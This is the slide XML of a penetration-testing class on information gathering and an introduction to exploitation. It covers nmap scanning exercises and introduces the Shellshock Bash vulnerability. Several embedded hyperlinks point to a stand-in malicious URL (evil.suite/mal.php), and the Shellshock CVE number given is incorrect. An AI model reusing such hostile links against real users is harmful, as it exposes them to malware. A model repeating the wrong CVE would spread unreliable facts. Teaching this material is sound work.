              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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1015"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1016" name="Google Shape;1016;p5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algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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 id="2147483709" r:id="rId12"/>
    <p:sldLayoutId id="2147483710" r:id="rId13"/>
    <p:sldLayoutId id="2147483711" r:id="rId14"/>
    <p:sldLayoutId id="2147483712" r:id="rId15"/>
    <p:sldLayoutId id="2147483713" r:id="rId16"/>
    <p:sldLayoutId id="2147483714" r:id="rId17"/>
    <p:sldLayoutId id="2147483715" r:id="rId18"/>
    <p:sldLayoutId id="2147483716" r:id="rId19"/>
    <p:sldLayoutId id="2147483717" r:id="rId20"/>
    <p:sldLayoutId id="2147483718" r:id="rId21"/>
    <p:sldLayoutId id="2147483719" r:id="rId22"/>
    <p:sldLayoutId id="2147483720" r:id="rId23"/>
    <p:sldLayoutId id="2147483721" r:id="rId24"/>
    <p:sldLayoutId id="2147483722" r:id="rId25"/>
    <p:sldLayoutId id="2147483723" r:id="rId26"/>
    <p:sldLayoutId id="2147483724" r:id="rId27"/>
    <p:sldLayoutId id="2147483725" r:id="rId28"/>
    <p:sldLayoutId id="2147483726" r:id="rId29"/>
    <p:sldLayoutId id="2147483727" r:id="rId30"/>
    <p:sldLayoutId id="2147483728" r:id="rId31"/>
    <p:sldLayoutId id="2147483729" r:id="rId32"/>
    <p:sldLayoutId id="2147483730" r:id="rId33"/>
    <p:sldLayoutId id="2147483731" r:id="rId34"/>
    <p:sldLayoutId id="2147483732" r:id="rId35"/>
    <p:sldLayoutId id="2147483733" r:id="rId36"/>
    <p:sldLayoutId id="2147483734" r:id="rId37"/>
    <p:sldLayoutId id="2147483735" r:id="rId38"/>
    <p:sldLayoutId id="2147483736" r:id="rId39"/>
    <p:sldLayoutId id="2147483737" r:id="rId40"/>
    <p:sldLayoutId id="2147483738" r:id="rId41"/>
    <p:sldLayoutId id="2147483739" r:id="rId42"/>
    <p:sldLayoutId id="2147483740" r:id="rId43"/>
    <p:sldLayoutId id="2147483741" r:id="rId44"/>
    <p:sldLayoutId id="2147483742" r:id="rId45"/>
    <p:sldLayoutId id="2147483743" r:id="rId46"/>
    <p:sldLayoutId id="2147483744" r:id="rId47"/>
    <p:sldLayoutId id="2147483745" r:id="rId48"/>
    <p:sldLayoutId id="2147483746" r:id="rId49"/>
    <p:sldLayoutId id="2147483747" r:id="rId50"/>
  </p:sldLayoutIdLst>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="400">
        <p:fade thruBlk="1"/>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hyperlink" Target="http://evil.suite/mal.php" TargetMode="External"/><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hyperlink" Target="http://evil.suite/mal.php" TargetMode="External"/><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hyperlink" Target="http://evil.suite/mal.php" TargetMode="External"/><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hyperlink" Target="http://evil.suite/mal.php" TargetMode="External"/><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hyperlink" Target="http://evil.suite/mal.php" TargetMode="External"/><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0.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hyperlink" Target="http://heartbleed.com/" TargetMode="External"/><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8.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5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028"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2029" name="Google Shape;2029;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="4319775"/>
            <a:ext cx="8344500" cy="319200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="9125" rIns="1188700" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pentesting Week 1, Day 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2030" name="Google Shape;2030;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1600200"/>
            <a:ext cx="8595300" cy="1248000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="2880350" tIns="0" rIns="457200" bIns="457200" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Information Gathering and</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="85200C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85200C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2031" name="Google Shape;2031;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525600" y="3447025"/>
            <a:ext cx="8344500" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="3200400" tIns="9125" rIns="274300" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>December 13, 2018</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2123" name="Google Shape;2123;p112"/>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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2124" name="Google Shape;2124;p112"/>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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to scan the top 100 ports of the live hosts you discovered above. Save the results to an XML file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2125" name="Google Shape;2125;p11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10</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2126" name="Google Shape;2126;p112"/>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127" name="Google Shape;2127;p112"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1378748"/>
            <a:ext cx="9144000" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap --top-ports 100 10.0.0.10 10.0.0.100-101 -oX /tmp/top_ports</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2128" name="Google Shape;2128;p112"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="2353513"/>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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to can the top 20 ports of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>scanme.nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>. Save the results as a normal file. </a:t>
            </a:r>
            <a:endParaRPr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32"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2133" name="Google Shape;2133;p113"/>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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2134" name="Google Shape;2134;p113"/>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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to scan the top 100 ports of the live hosts you discovered above. Save the results to an XML file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2135" name="Google Shape;2135;p11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11</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2136" name="Google Shape;2136;p113"/>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137" name="Google Shape;2137;p113"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1378748"/>
            <a:ext cx="9144000" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap --top-ports 100 10.0.0.10 10.0.0.100-101 -oX /tmp/top_ports</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2138" name="Google Shape;2138;p113"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="2353513"/>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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to can the top 20 ports of scanme.nmap,orf. Save the results as a normal file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2139" name="Google Shape;2139;p113"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263" y="2854300"/>
            <a:ext cx="9144000" cy="1005000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap --top-ports 20 scanme.nmap.org -oN results.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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43"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2144" name="Google Shape;2144;p114"/>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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2145" name="Google Shape;2145;p11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12</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2146" name="Google Shape;2146;p114"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="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12</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2147" name="Google Shape;2147;p114"/>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51"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2152" name="Google Shape;2152;p115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442500" y="1417775"/>
            <a:ext cx="8165400" cy="26670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115"/>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Introducing Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2154" name="Google Shape;2154;p115"/>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Shellshock is a critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote Code Execution (RCE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerability in Bash. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2155" name="Google Shape;2155;p11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13</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2156" name="Google Shape;2156;p115"/>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157" name="Google Shape;2157;p115"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2626800" y="1711175"/>
            <a:ext cx="6149700" cy="2028000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shellshock, documented as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2014-6217</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, is critical because it allows attackers to execute arbitrary code on vulnerable servers.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Millions of servers were compromised just days after the vulnerability was disclosed. </a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
